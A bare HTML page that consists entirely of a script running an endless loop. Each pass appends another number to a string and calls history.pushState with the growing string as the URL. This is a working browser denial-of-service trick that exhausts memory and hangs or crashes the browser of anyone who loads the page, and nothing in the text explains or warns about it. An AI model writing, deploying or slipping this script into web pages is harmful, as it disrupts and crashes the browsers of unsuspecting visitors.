<html> <body> <script> var total=""; var i=1; while(i++){ total = total+i.toString(); history.pushState(0,0,total); } </script> </body> </html>